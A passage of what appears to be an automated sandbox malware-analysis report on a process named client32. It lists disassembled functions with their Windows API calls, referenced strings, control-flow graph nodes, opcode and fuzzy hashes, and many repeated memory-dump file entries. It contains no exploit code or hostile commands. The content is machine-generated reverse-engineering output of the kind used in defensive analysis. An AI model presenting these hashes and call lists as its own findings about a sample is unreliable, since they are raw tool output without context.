                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                                                • API String ID: 3874234733-2061581830
                                                                                                                                                                • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                                                                                                • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                                                                                                • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                                                                                                • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D
                                                                                                                                                                Function 11139090 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1727 11139090-111390c5 1728 111390d2-111390d9 1727->1728 1729 111390c7-111390cd GetCurrentThreadId 1727->1729 1730 111390e0-111390fc call 11133920 call 11133400 1728->1730 1731 111390db call 11029330 1728->1731 1729->1728 1737 11139102-11139108 1730->1737 1738 111391db-111391e2 1730->1738 1731->1730 1739 1113975a-11139775 call 11161d01 1737->1739 1740 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 1737->1740 1741 1113929a-111392b0 1738->1741 1742 111391e8-111391ef 1738->1742 1778 111391d1 1740->1778 1779 11139171-11139177 1740->1779 1752 111392b6-111392bd 1741->1752 1753 111393ef 1741->1753 1742->1741 1745 111391f5-111391fc 1742->1745 1745->1741 1748 11139202-11139211 FindWindowA 1745->1748 1748->1741 1751 11139217-1113921c IsWindowVisible 1748->1751 1751->1741 1755 1113921e-11139225 1751->1755 1756 111392bf-111392c9 1752->1756 1757 111392ce-111392ee call 1105dd10 1752->1757 1758 111393f1-11139402 1753->1758 1759 11139435-11139440 1753->1759 1755->1741 1763 11139227-1113924c call 11138c30 IsWindowVisible 1755->1763 1756->1759 1757->1759 1775 111392f4-11139323 1757->1775 1765 11139404-11139414 1758->1765 1766 1113941a-1113942f 1758->1766 1760 11139442-11139462 call 1105dd10 1759->1760 1761 11139476-1113947c 1759->1761 1785 11139470 1760->1785 1786 11139464-1113946e call 1102cff0 1760->1786 1770 1113947e-1113948a call 11138c30 1761->1770 1771 1113948d-11139495 1761->1771 1763->1741 1782 1113924e-1113925d IsIconic 1763->1782 1765->1766 1766->1759 1770->1771 1773 111394a7-111394b2 call 1112ce90 1771->1773 1774 11139497-111394a2 call 1106b860 1771->1774 1797 111394b4-111394ba call 11131b00 1773->1797 1798 111394bd-111394c6 1773->1798 1774->1773 1795 11139325-11139339 call 11081a70 1775->1795 1796 1113933e-11139351 call 11143230 1775->1796 1778->1738 1779->1778 1787 11139179-11139190 call 11146450 GetForegroundWindow 1779->1787 1782->1741 1789 1113925f-1113927a GetForegroundWindow call 11131210 * 2 1782->1789 1785->1761 1786->1761 1807 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 1787->1807 1808 111391be-111391c0 1787->1808 1831 1113928b-11139294 EnableWindow 1789->1831 1832 1113927c-11139282 1789->1832 1795->1796 1823 1113933b 1795->1823 1824 11139353-11139364 GetLastError call 11146450 1796->1824 1825 1113936e-11139375 1796->1825 1797->1798 1805 111394d4 call 111317a0 1798->1805 1806 111394c8-111394cb 1798->1806 1814 111394d9-111394df 1805->1814 1806->1814 1815 111394cd-111394d2 call 11131870 1806->1815 1807->1808 1808->1778 1810 111391c2-111391c8 1808->1810 1810->1778 1822 111391ca-111391cb SetForegroundWindow 1810->1822 1818 111394e5-111394eb 1814->1818 1819 111395e9-111395f4 call 111386b0 1814->1819 1815->1814 1827 111394f1-111394f9 1818->1827 1828 1113959b-111395a3 1818->1828 1845 111395f6-11139608 call 110637c0 1819->1845 1846 11139615-1113961b 1819->1846 1822->1778 1823->1796 1824->1825 1835 11139377-11139392 1825->1835 1836 111393e8 1825->1836 1827->1819 1837 111394ff-11139505 1827->1837 1828->1819 1841 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 1828->1841 1831->1741 1832->1831 1840 11139284-11139285 SetForegroundWindow 1832->1840 1843 11139395-111393a1 1835->1843 1836->1753 1837->1819 1844 1113950b-11139522 call 1110f420 1837->1844 1840->1831 1841->1819 1848 111393a3-111393b7 call 11081a70 1843->1848 1849 111393bc-111393c9 call 11143230 1843->1849 1862 11139544 1844->1862 1863 11139524-11139542 call 110573b0 1844->1863 1845->1846 1865 1113960a-11139610 call 11142210 1845->1865 1853 11139621-11139628 1846->1853 1854 1113974a-11139752 1846->1854 1848->1849 1869 111393b9 1848->1869 1849->1836 1871 111393cb-111393e6 GetLastError call 11146450 1849->1871 1853->1854 1860 1113962e-11139647 call 1105dd10 1853->1860 1854->1739 1860->1854 1875 1113964d-11139660 1860->1875 1872 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 1862->1872 1863->1872 1865->1846 1869->1849 1871->1759 1872->1819 1906 11139594-11139599 call 110ebf30 1872->1906 1887 11139662-11139668 1875->1887 1888 1113968d-11139693 1875->1888 1891 1113966a-11139688 call 11146450 GetTickCount 1887->1891 1892 11139699-111396a5 GetTickCount 1887->1892 1888->1854 1888->1892 1891->1854 1892->1854 1896 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 1892->1896 1913 111396f0-111396f5 1896->1913 1906->1819 1913->1913 1914 111396f7-111396fd 1913->1914 1915 11139700-11139705 1914->1915 1915->1915 1916 11139707-11139731 call 1112c7a0 1915->1916 1919 11139733-11139734 FreeLibrary 1916->1919 1920 1113973a-11139747 call 111618c1 1916->1920 1919->1920 1920->1854
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                                                                                                • IsWindow.USER32(000802A6), ref: 11139125
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139133
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 1113916B
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 11139186
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000000), ref: 111391A0
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 111391BC
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139248
                                                                                                                                                                • IsIconic.USER32(000802A6), ref: 11139255
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 1113925F
                                                                                                                                                                  • Part of subcall function 11131210: ShowWindow.USER32(000802A6,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                                                                                  • Part of subcall function 11131210: ShowWindow.USER32(000802A6,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 11139294
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11139353
                                                                                                                                                                • GetLastError.KERNEL32 ref: 111393CB
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11139678
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11139699
                                                                                                                                                                  • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                                                                                                • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                                                                                • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                                                                                • API String ID: 2511061093-2542869446
                                                                                                                                                                • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                                                                                • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                                                                                                • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                                                                                • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                                                                                                Function 111450A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                • _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76968400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                                                                                • _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                  • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                                                                • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                                • API String ID: 3299820421-2117887902
                                                                                                                                                                • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                                                                                • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                                                                                                • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                                                                                • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                                                                                                Function 11115B70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                                                                                                • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                                                                                                • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                                                                                                • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                                • API String ID: 4195908086-2348320231
                                                                                                                                                                • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                                                                                • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                                                                                                • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                                                                                • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                                                                                                Function 110733B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset
                                                                                                                                                                • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                                                • API String ID: 2102423945-35127696
                                                                                                                                                                • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                                                                                • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                                                                                                • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                                                                                • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                                                                                                Function 110310C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                                                • API String ID: 3192549508-611217420
                                                                                                                                                                • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                                                                                                • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                                                                                                • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                                                                                                • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                                                                                                Function 1109E910 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                                                                                • EqualSid.ADVAPI32(?,013808B8,?,00000001,00000001), ref: 1109E9A3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1878589025-0
                                                                                                                                                                • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                                                                                • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                                                                                                • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                                                                                • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                                                                                                Function 1109D440 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
